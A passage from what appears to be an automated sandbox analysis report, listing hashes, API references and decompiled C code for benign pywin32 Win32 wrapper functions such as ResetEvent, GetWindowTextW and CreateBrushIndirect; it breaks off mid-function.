                            • Opcode ID: 5df1a51d1136daecced7f00442bb79e8460876b91f1440704298c6fa85e35569
                            • Instruction ID: b79a81782579265738448d061d17d0f055bfa02ac01b71cc01b7234bed445075
                            • Opcode Fuzzy Hash: 5df1a51d1136daecced7f00442bb79e8460876b91f1440704298c6fa85e35569
                            • Instruction Fuzzy Hash: 60F0907841C2019FDF00AB54EC05B363BF8BF48206F484434F858C5121F7758569DA5A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:ResetEvent), ref: 6DA91F27
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DA91F43
                            • ResetEvent.KERNEL32(?), ref: 6DA91F54
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ResetEvent,00000000), ref: 6DA91F64
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@EventObject_ParseResetTupleWin_
                            • String ID: O:ResetEvent$ResetEvent
                            • API String ID: 4122562086-1175610888
                            • Opcode ID: 8727c7a174362ba529ab325683bd4cbb063949a65641655cbb11f77cab8243a8
                            • Instruction ID: 1cd1e76aa05a60f31c1f4350c4b3f41306efd972cd9f768740e1519a900bd9ff
                            • Opcode Fuzzy Hash: 8727c7a174362ba529ab325683bd4cbb063949a65641655cbb11f77cab8243a8
                            • Instruction Fuzzy Hash: 1BF0907442C2019FDF005B24EC05B363BF8BF4420AF484434E854C5111FB76956ADA5A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,6DABF124), ref: 6DAA7D76
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA7D95
                            • PyEval_SaveThread.PYTHON38 ref: 6DAA7DA4
                            • GetWindowTextW.USER32 ref: 6DAA7DBA
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAA7DC3
                            • ?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_WH@Z.PYWINTYPES38(?,00000000), ref: 6DAA7DCF
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Object_ThreadU_object@@$Arg_FromParseRestoreSaveTextTupleWindow
                            • String ID:
                            • API String ID: 915574332-0
                            • Opcode ID: cc213e19ccbfd771d6782c4041d7633bc1f18b5853507429572c67dbd1fac47d
                            • Instruction ID: 6cd05f38719c896096f66807930a8893a3ce000c6348464020b529809ef76b1f
                            • Opcode Fuzzy Hash: cc213e19ccbfd771d6782c4041d7633bc1f18b5853507429572c67dbd1fac47d
                            • Instruction Fuzzy Hash: E5F08176408301AFDB109B64DD49AAB7BBCEF81601F084A38FA55D2160E735891BCAA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SystemParametersInfoW.USER32 ref: 6DAAC646
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SystemParametersInfo,00000000), ref: 6DAAC656
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6DAAC963
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DAAC978
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Error@@FreeInfoObject_ParametersSystemU_object@@Win_free
                            • String ID: SystemParametersInfo
                            • API String ID: 731016232-3337517057
                            • Opcode ID: 699bfd1313ea23fd9441f247ec9beb14b2cac8d6b196757575ffd811e94c0378
                            • Instruction ID: e9f2ad29c1229b1e6a2758303ad75edbdf10f74c7a785af7bd7217d61b145205
                            • Opcode Fuzzy Hash: 699bfd1313ea23fd9441f247ec9beb14b2cac8d6b196757575ffd811e94c0378
                            • Instruction Fuzzy Hash: 9F01D27860C302DFEA00DF19CC8496A7BF4FB85315F0C8B29F485C2120D731C9AA9B62
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 50%
                            			E6DAAD140(void* __ecx, intOrPtr _a8) {
                            				struct tagLOGBRUSH _v12;
                            				char _v16;
                            				void* _t5;
                            				struct HBRUSH__* _t10;
                            
                            				_t5 =  &_v16;
                            				__imp__PyArg_ParseTuple(_a8, "O:CreateBrushIndirect", _t5);
                            				if(_t5 != 0) {
                            					if(E6DAAD0A0(_v16,  &_v12) == 0) {
                            						goto L1;
                            					} else {
                            						_t10 = CreateBrushIndirect( &_v12);
                            						if(_t10 != 0) {
                            							return E6DAA5630(__ecx, _t10);
                            						} else {
                            							__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("CreateBrushIndirect", _t10);
                            							return _t10;
                            						}
                            					}
                            				} else {
                            					L1:
                            					return 0;
                            				}
                            			}








                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:CreateBrushIndirect), ref: 6DAAD150
                            • CreateBrushIndirect.GDI32(?), ref: 6DAAD17D
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(CreateBrushIndirect,00000000), ref: 6DAAD18D
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_BrushCreateError@@IndirectParseTupleU_object@@Win_
                            • String ID: CreateBrushIndirect$O:CreateBrushIndirect
                            • API String ID: 2838503932-3748313448
                            • Opcode ID: 7a270697f392bfd58ccccf98d87087e3d7cd8032b47d6602967557ae027c7231
                            • Instruction ID: bc9bb9c20ebed1d20dc67b1d0032f6f5e5843496021627ee576b3ca5c58f3390
                            • Opcode Fuzzy Hash: 7a270697f392bfd58ccccf98d87087e3d7cd8032b47d6602967557ae027c7231
                            • Instruction Fuzzy Hash: 60F082F5C0C2016FEF006B659D45A3A36ACBA80115FCC4E64FC98C2222F739C669C653
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,?), ref: 6DAA6CA6
                            • IsBadReadPtr.KERNEL32(?), ref: 6DAA6CBA
                            • PyErr_SetString.PYTHON38(6E28ED94,The value is not a valid address for reading), ref: 6DAA6CD0
                            • ?PyBuffer_FromMemory@@YAPAU_object@@PAXH@Z.PYWINTYPES38(?), ref: 6DAA6CE6
                            Strings
                            • The value is not a valid address for reading, xrefs: 6DAA6CC9
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Buffer_Err_FromMemory@@ParseReadStringTupleU_object@@
                            • String ID: The value is not a valid address for reading
                            • API String ID: 1788285653-1942545440
                            • Opcode ID: 1c537b5caefcc92a2be95e41965e7aea43a5d7b700e806f698524029174a51c3
                            • Instruction ID: dfb6bc39fce387e6c50686d40aa5a885f65f7d3ab98bcdca4df5ce240bbaf996
                            • Opcode Fuzzy Hash: 1c537b5caefcc92a2be95e41965e7aea43a5d7b700e806f698524029174a51c3
                            • Instruction Fuzzy Hash: 92F05E34408201EFDF016F64DC45A5A7BB5FF05202F488925F8A5C1130E732897BDFA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,:WaitMessage), ref: 6DAB1559
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB1569
                            • WaitMessage.USER32 ref: 6DAB1571
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB157A
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_Thread$Arg_MessageParseRestoreSaveTupleWait
                            • String ID: :WaitMessage
                            • API String ID: 3704248073-3604857323
                            • Opcode ID: 91127b688dac124351d1674606c27174944b5aaae7c7203618345d5de4b62fa9
                            • Instruction ID: 556e974827b645684fab57cf8d490999e3bcf3e8f0406601ebd8692510d852e2
                            • Opcode Fuzzy Hash: 91127b688dac124351d1674606c27174944b5aaae7c7203618345d5de4b62fa9
                            • Instruction Fuzzy Hash: F4E06D3940C301DFCF011F25D88876A3BBAFF86352F08C669EC0A83221D73188578BA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 30%
                            			E6DAA5940(int _a4, int _a8, int _a12, long _a16) {
                            				int _v8;
                            				intOrPtr _v16;
                            				int _v20;
                            				long _v24;
                            				long _t17;
                            				void* _t19;
                            				long _t21;
                            				void* _t22;
                            				struct HWND__* _t23;
                            				void* _t28;
                            				long _t29;
                            				void* _t32;
                            				intOrPtr _t36;
                            
                            				 *[fs:0x0] = _t36;
                            				_t23 = _a4;
                            				_t17 = GetClassLongW(_t23, 0);
                            				_a4 = 0;
                            				__imp__PyGILState_Ensure(_t28, _t32, _t22,  *[fs:0x0], E6DABAAFC, 0xffffffff);
                            				_t29 = _t17;
                            				_v20 = 0;
                            				_v24 = _t29;
                            				_v8 = 0;
                            				_t19 = E6DAA5750(_t17, _t23, _a8, _a12, _a16,  &_a4);
                            				_push(_t29);
                            				if(_t19 != 0) {
                            					__imp__PyGILState_Release();
                            					 *[fs:0x0] = _v16;
                            					return _a4;
                            				} else {
                            					__imp__PyGILState_Release();
                            					_t21 = DefDlgProcW(_t23, _a8, _a12, _a16);
                            					 *[fs:0x0] = _v16;
                            					return _t21;
                            				}
                            			}

















                            APIs
                            • GetClassLongW.USER32(?,00000000), ref: 6DAA5964
                            • PyGILState_Ensure.PYTHON38 ref: 6DAA5973
                              • Part of subcall function 6DAA5750: PyLong_FromLong.PYTHON38(00000000), ref: 6DAA5771
                            • PyGILState_Release.PYTHON38(00000000), ref: 6DAA59A8
                            • DefDlgProcW.USER32(?,?,00000000,?), ref: 6DAA59BB
                            • PyGILState_Release.PYTHON38(00000000), ref: 6DAA59D4
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: State_$LongRelease$ClassEnsureFromLong_Proc
                            • String ID:
                            • API String ID: 2361800756-0
                            • Opcode ID: 5928900da7eadcc6dee602e3db3d82c3240185e1470509467e9cceea01d4a0de
                            • Instruction ID: 5f1cb9296d6a07b60f74814cf17c313177608ff7d39770c6dd25f35b0f24dfbc
                            • Opcode Fuzzy Hash: 5928900da7eadcc6dee602e3db3d82c3240185e1470509467e9cceea01d4a0de
                            • Instruction Fuzzy Hash: 8A11B276504248EFCF00CF88DC84FAABB78FB08361F008626FD0A92240D3359521CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 30%
                            			E6DAA5880(int _a4, int _a8, int _a12, long _a16) {
                            				int _v8;
                            				intOrPtr _v16;
                            				int _v20;
                            				long _v24;
                            				long _t17;
                            				void* _t19;
                            				long _t21;
                            				void* _t22;
                            				struct HWND__* _t23;
                            				void* _t28;
                            				long _t29;
                            				void* _t32;
                            				intOrPtr _t36;
                            
                            				 *[fs:0x0] = _t36;
                            				_t23 = _a4;
                            				_t17 = GetClassLongW(_t23, 0);
                            				_a4 = 0;
                            				__imp__PyGILState_Ensure(_t28, _t32, _t22,  *[fs:0x0], E6DABAAEA, 0xffffffff);
                            				_t29 = _t17;
                            				_v20 = 0;
                            				_v24 = _t29;
                            				_v8 = 0;
                            				_t19 = E6DAA5750(_t17, _t23, _a8, _a12, _a16,  &_a4);
                            				_push(_t29);
                            				if(_t19 != 0) {
                            					__imp__PyGILState_Release();
                            					 *[fs:0x0] = _v16;
                            					return _a4;
                            				} else {
                            					__imp__PyGILState_Release();
                            					_t21 = DefWindowProcW(_t23, _a8, _a12, _a16);
                            					 *[fs:0x0] = _v16;
                            					return _t21;
                            				}
                            			}

















                            APIs
                            • GetClassLongW.USER32(?,00000000), ref: 6DAA58A4
                            • PyGILState_Ensure.PYTHON38 ref: 6DAA58B3
                              • Part of subcall function 6DAA5750: PyLong_FromLong.PYTHON38(00000000), ref: 6DAA5771
                            • PyGILState_Release.PYTHON38(00000000), ref: 6DAA58E8
                            • DefWindowProcW.USER32(?,?,00000000,?), ref: 6DAA58FB
                            • PyGILState_Release.PYTHON38(00000000), ref: 6DAA5914
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: State_$LongRelease$ClassEnsureFromLong_ProcWindow
                            • String ID:
                            • API String ID: 972757289-0
                            • Opcode ID: f49aed097b409bc57b972cf9fc295c88699c5c085f81b852f38e383fe84dce06
                            • Instruction ID: 7895e2d352dd890eac3ca22447647d9fb0ee515c7f2413b5d5d1acff3fd26613
                            • Opcode Fuzzy Hash: f49aed097b409bc57b972cf9fc295c88699c5c085f81b852f38e383fe84dce06
                            • Instruction Fuzzy Hash: 5F119476504208FFCF00CF98DC44FAABB78FB49761F048626FD0A96241D7359521CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiOi:WaitForMultipleObjectsEx,?,?,?), ref: 6DA9226F
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA9228A
                            • PyErr_Occurred.PYTHON38 ref: 6DA9229A
                            Strings
                            • OiOi:WaitForMultipleObjectsEx, xrefs: 6DA92266
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_LongLong_MaskOccurredParseTupleUnsigned
                            • String ID: OiOi:WaitForMultipleObjectsEx
                            • API String ID: 3166690688-2605111738
                            • Opcode ID: cd3f55e89660ef76907483b826db4bf76ee9047a5755670d42dbdc0e661bb0a8
                            • Instruction ID: 0785fb1434d247915e33d896d16c8b1d775131caba2c23fce70a4efdf9ecd224
                            • Opcode Fuzzy Hash: cd3f55e89660ef76907483b826db4bf76ee9047a5755670d42dbdc0e661bb0a8
                            • Instruction Fuzzy Hash: B601F23640C212AFD710AF18DC00AAB7BFCEF84224FC48969FCB885151F734D1588A93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiO:WaitForMultipleObjects,00000000,?), ref: 6DA921EA
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA92205
                            • PyErr_Occurred.PYTHON38 ref: 6DA92215
                            Strings
                            • OiO:WaitForMultipleObjects, xrefs: 6DA921E1
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_LongLong_MaskOccurredParseTupleUnsigned
                            • String ID: OiO:WaitForMultipleObjects
                            • API String ID: 3166690688-1585993556
                            • Opcode ID: bf58ee1e99b62e718d23513c58fe1b53fa03993ec9dbab7101f61dcdbd1c20f0
                            • Instruction ID: 705b36eb08254bf904bfde1a0f3978e4e30f011c2fc7e09e18d6da0663f79664
                            • Opcode Fuzzy Hash: bf58ee1e99b62e718d23513c58fe1b53fa03993ec9dbab7101f61dcdbd1c20f0
                            • Instruction Fuzzy Hash: D3F0D17680C2016BC7109E18FC04BEB7BF8EB85624F848539FCA8C5250F7358A58C697
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,6DABF194), ref: 6DAA7E00
                            • InitCommonControlsEx.COMCTL32 ref: 6DAA7E25
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(InitCommonControlsEx,00000000), ref: 6DAA7E35
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_CommonControlsError@@InitParseTupleU_object@@Win_
                            • String ID: InitCommonControlsEx
                            • API String ID: 18624807-2357626986
                            • Opcode ID: 5cb9e425f2570631a371aa18862f98a69c06d1fdf950aff143bb26a759b145aa
                            • Instruction ID: 8b4873169808acf9685c75ceba8d8a806a968b02f2a0fb9f2daa8bdebeb0c49f
                            • Opcode Fuzzy Hash: 5cb9e425f2570631a371aa18862f98a69c06d1fdf950aff143bb26a759b145aa
                            • Instruction Fuzzy Hash: 0CF0D0B890C2059FC700DF15E885B2677F8BB45204F888524EC89C2265E7358A6A9A53
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyErr_SetString.PYTHON38(6E28ED8C,BLENDFUNCTION must be a tuple of four small ints (0-255)), ref: 6DAA55AC
                            • PyArg_ParseTuple.PYTHON38(?,BBBB:BLENDFUNCTION,?,?,?,?), ref: 6DAA55CF
                            Strings
                            • BBBB:BLENDFUNCTION, xrefs: 6DAA55C9
                            • BLENDFUNCTION must be a tuple of four small ints (0-255), xrefs: 6DAA55A5
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_ParseStringTuple
                            • String ID: BBBB:BLENDFUNCTION$BLENDFUNCTION must be a tuple of four small ints (0-255)
                            • API String ID: 385655187-936056796
                            • Opcode ID: a7926fd74d363d423c08216e1c95781b1f51643b98acac28daa7aec41837c195
                            • Instruction ID: 9341e3077417ce21d4acb370b19655917fea5073e034bdaf22848264bed9003e
                            • Opcode Fuzzy Hash: a7926fd74d363d423c08216e1c95781b1f51643b98acac28daa7aec41837c195
                            • Instruction Fuzzy Hash: C8E03975108205AFCB04CB10CC88E26B7BDBB84208B49C299B40A86122E732E95BDB91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • PyErr_SetString.PYTHON38(6E28ED8C,SIZE must be a tuple of 2 ints (x,y)), ref: 6DAA55FC
                            • PyArg_ParseTuple.PYTHON38(?,ll;SIZE must be a tuple of 2 ints (x,y),?,?), ref: 6DAA5617
                            Strings
                            • ll;SIZE must be a tuple of 2 ints (x,y), xrefs: 6DAA5611
                            • SIZE must be a tuple of 2 ints (x,y), xrefs: 6DAA55F5
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_ParseStringTuple
                            • String ID: SIZE must be a tuple of 2 ints (x,y)$ll;SIZE must be a tuple of 2 ints (x,y)
                            • API String ID: 385655187-180444728
                            • Opcode ID: 3107b35b459c234bf4836b61e73135ad1b2a611327e3afc8d70a758c123da96f
                            • Instruction ID: 0bc7a9ff999e98224d8902ad1b53dde3a00734a89b717a70937477d6eeb1a6f5
                            • Opcode Fuzzy Hash: 3107b35b459c234bf4836b61e73135ad1b2a611327e3afc8d70a758c123da96f
                            • Instruction Fuzzy Hash: DFE04F74108201AFDB04CB24C984E36BBF9FF85309F48C648F40987122D731E85BDB51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 16%
                            			E6DAB14D0(intOrPtr _a8) {
                            				void* _t2;
                            				void* _t3;
                            				void* _t4;
                            				int* _t5;
                            
                            				_t2 = _t4;
                            				__imp__PyArg_ParseTuple(_a8, "i:GetStockObject", _t2);
                            				_t5 = _t4 + 0xc;
                            				if(_t2 != 0) {
                            					_t3 = GetStockObject( *_t5);
                            					__imp__?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z(_t3);
                            					return _t3;
                            				} else {
                            					return _t2;
                            				}
                            			}

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,i:GetStockObject), ref: 6DAB14DE
                            • GetStockObject.GDI32 ref: 6DAB14F0
                            • ?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z.PYWINTYPES38(00000000), ref: 6DAB14F7
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_FromLong_ObjectParseStockTupleU_object@@
                            • String ID: i:GetStockObject
                            • API String ID: 247005983-3892312752
                            • Opcode ID: 4f1a1c02a2f12ecb3647eac6d6d447bf15273e0523bef8c644fcdd56a50ce140
                            • Instruction ID: 15f0591484196e178638e8b6648d631fbd65a619cdcbe8a3202e58226ad6054b
                            • Opcode Fuzzy Hash: 4f1a1c02a2f12ecb3647eac6d6d447bf15273e0523bef8c644fcdd56a50ce140
                            • Instruction Fuzzy Hash: D5D05EB100C2009FCF041B65EC48E2A777DEF40202F188529F897C0061E731887AAE26
                            Uniqueness

                            Uniqueness Score: -1.00%

                            C-Code - Quality: 96%
                            			E6DAA44C0() {
                            				signed short _t71;
                            				signed short _t72;
                            				unsigned int _t75;
                            				unsigned int _t77;
                            				void* _t78;
                            				void* _t79;
                            				unsigned int _t80;
                            				signed int _t83;
                            				signed short _t84;
                            				void** _t85;
                            				signed int _t89;
                            				signed short _t90;
                            				signed int _t91;
                            				void* _t92;
                            				unsigned int _t94;
                            				signed int _t95;
                            				void* _t96;
                            				void* _t97;
                            				void* _t99;
                            				unsigned int _t101;
                            				signed char* _t102;
                            				void* _t104;
                            				void** _t107;
                            				signed short* _t108;
                            				signed short* _t109;
                            				void** _t112;
                            				signed short* _t117;
                            				signed short* _t118;
                            				signed int _t120;
                            				signed short* _t121;
                            				signed short* _t122;
                            				signed short* _t123;
                            				void* _t124;
                            				signed short* _t125;
                            				void* _t126;
                            				unsigned int _t127;
                            				unsigned int _t130;
                            				signed short* _t133;
                            				signed int _t135;
                            				long _t136;
                            				unsigned int* _t137;
                            				unsigned int* _t138;
                            				void* _t140;
                            				signed int _t142;
                            				void* _t144;
                            				void* _t146;
                            				signed short* _t148;
                            				signed short* _t151;
                            				unsigned int _t152;
                            				unsigned int* _t153;
                            				void* _t155;
                            				void* _t158;
                            				signed short* _t159;
                            				unsigned int _t162;
                            				void* _t163;
                            
                            				_t159 =  *(_t163 + 0x10);
                            				_t133 = _t159;
                            				 *(_t163 + 0x10) = _t107;
                            				_t148 =  !=  ?  *((intOrPtr*)(_t163 + 0x14)) : L"MS Sans Serif";
                            				_t108 =  &(_t133[1]);
                            				do {
                            					_t71 =  *_t133;
                            					_t133 =  &(_t133[1]);
                            				} while (_t71 != 0);
                            				_t109 = _t148;
                            				_t135 = _t133 - _t108 >> 1;
                            				_t151 =  &(_t109[1]);
                            				do {
                            					_t72 =  *_t109;
                            					_t109 =  &(_t109[1]);
                            				} while (_t72 != 0);
                            				_t101 =  *(_t163 + 0x28);
                            				_t112 =  *(_t163 + 0x10);
                            				_t136 = 0x26 + ((_t109 - _t151 >> 1) + _t135) * 2;
                            				_t75 = _t101 >> 0x10;
                            				 *(_t163 + 0x24) = _t75;
                            				_t112[1] = _t136;
                            				if(_t75 == 0) {
                            					L8:
                            					_t152 =  *(_t163 + 0x2c);
                            					_t77 = _t152 >> 0x10;
                            					 *(_t163 + 0x28) = _t77;
                            					if(_t77 == 0) {
                            						L12:
                            						_t78 = GlobalAlloc(0x42, _t112[1]);
                            						 *( *(_t163 + 0x10)) = _t78;
                            						_t79 = GlobalLock(_t78);
                            						 *(_t163 + 0x2c) = _t79;
                            						_t29 = _t79 + 0x12; // 0x12
                            						_t137 = _t29;
                            						asm("movups xmm0, [ecx]");
                            						asm("movups [eax], xmm0");
